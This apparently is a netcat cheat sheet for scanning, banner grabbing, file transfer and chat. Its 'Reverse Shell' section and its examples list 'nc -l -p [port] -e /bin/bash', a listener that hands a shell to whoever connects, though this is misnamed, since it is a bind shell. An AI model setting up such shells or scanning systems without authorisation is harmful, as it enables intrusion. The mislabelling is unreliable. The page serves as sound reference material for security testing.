Netcat
Netcat, or nc
, serves as a versatile command-line utility for port scanning, allowing users to check the availability of services on a target system.
Basic TCP Port Scan:
nc -zv [hostname] [start-port]-[end-port]
Conducts a basic TCP port scan on the specified hostname within a defined port range, revealing open ports.
UDP Port Scan:
nc -uzv [hostname] [start-port]-[end-port]
Performs a UDP port scan on the specified hostname within a defined port range, identifying open UDP ports.
Banner Grabbing:
Retrieve Service Banner:
nc -v [hostname] [port]
Connects to the specified port on the target system, displaying information from the service banner for identification.
TCP Connection Test:
Full TCP Connection Test:
nc -v [hostname] [port]
Initiates a full TCP connection to the specified port, providing detailed connection information.
Reverse Shell:
Set up Reverse Shell (Listener):
nc -l -p [port] -e /bin/bash
Sets up netcat as a listener, waiting for an incoming connection and spawning a shell on successful connection.
Initiate Reverse Shell (Initiator):
nc [listener-hostname] [port]
Initiates a connection to a netcat listener, potentially providing remote shell access.
File Transfer:
Receive File (TCP):
nc -l -p [port] > [output-file]
Listens on a specified port for incoming data and saves it to a file, useful for receiving files via TCP.
Send File (TCP):
nc [receiver-hostname] [port] < [input-file]
Connects to a netcat listener and sends the contents of a file to the receiver via TCP.
Chat Mode (Two-way Communication):
Initiate Chat Mode (TCP):
nc -l -p [port] # On one terminal nc [hostname] [port] # On another terminal
Enables a simple chat mode for exchanging data between two terminals using TCP.
Summary:
Usage: nc [options] [hostname] [port]
Options:
-l
: Listen mode, for inbound connects-p port
: Specify source port to use-e command
: Execute command after connect-s addr
: Local source address-v
: Verbose-w timeout
: Connect timeout-z
: Zero-I/O mode (scanning but sends no data)-u
: UDP mode (unreliable since many firewalls drop ICMP packets).-o file
: hex dump file of traffic
Examples:
nc -l -p 1234
: Listen on port 1234 for incoming connectionsnc -l -p 1234 -e /bin/bash
: Listen on port 1234 and execute /bin/bash on incoming connectionnc -v -z example.com 80-100
: Perform a verbose port scan on example.com from ports 80 to 100
Resources:
Last updated